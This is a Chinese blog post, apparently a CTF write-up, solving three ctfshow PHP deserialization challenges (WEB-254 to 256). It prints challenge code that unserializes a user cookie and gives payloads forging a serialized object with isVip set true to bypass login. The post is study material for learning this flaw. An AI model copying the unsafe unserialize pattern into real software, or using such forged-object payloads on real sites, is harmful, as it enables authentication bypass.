博客主页 🐟
CtfShow------反序列化
CtfShow------反序列化
网络安全 PHP
PHP CTF
CC BY-NC-SA 4.0
原创

Author:

©

Wordage:

共计 4168 字

needs:

约 1 分钟

Popular:

255 ℃

Created:

CtfShow------反序列化
目 录

仅供学习参考,禁止用于其他非法途径

WEB-254

<?php
error_reporting(0);
highlight_file(__FILE__);
include('flag.php');

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        if($this->username===$u&&$this->password===$p){
            $this->isVip=true;
        }
        return $this->isVip;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            echo "your flag is ".$flag;
        }else{
            echo "no vip, no flag";
        }
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = new ctfShowUser();
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}

payload:

?username=xxxxxx&password=xxxxxx

WEB-255

<?php
error_reporting(0);
highlight_file(__FILE__);
include('flag.php');

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            echo "your flag is ".$flag;
        }else{
            echo "no vip, no flag";
        }
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);    
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}

payload:

<?php
class ctfShowUser{
    public $isVip=true;
}
echo serialize(new ctfShowUser);
?>
?username=xxxxxx&password=xxxxxx
Cookie:UM_distinctid=17c95da0c80564-0340f1bfe86514-513c1f42-1fa400-17c95da0c81c6f;user=O:11:"ctfShowUser":1:{s:5:"isVip"%3bb:1%3b}

WEB-256

<?php

highlight_file(__FILE__);
include('flag.php');

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            if($this->username!==$this->password){
                    echo "your flag is ".$flag;
              }
        }else{
            echo "no vip, no flag";
        }
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);    
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}

payload:

<?php
class ctfShowUser{
    public $isVip=true;
    public $username='a';
}
echo serialize(new ctfShowUser);
?>
?username=a&password=xxxxxx
Cookie:UM_distinctid=17c95da0c80564-0340f1bfe86514-513c1f42-1fa400-17c95da0c81c6f;user=O:11:"ctfShowUser":2:{s:5:"isVip"%3bb:1%3bs:8:"username"%3bs:1:"a"%3b}
文章二维码
CtfShow------反序列化
共计 0 条评论,点此发表评论
博客主页 哀.net OωO
萌ICP备20238808号 数字生命计划 本站已运行 1 年 272 天 11 小时 49 分 Copyright © 2023 ~ 2024. 哀.net All rights reserved.
打赏图
打赏博主
欢迎
搜 索
足 迹
分 类
  • 默认分类
  • 语言分类
  • 其他分类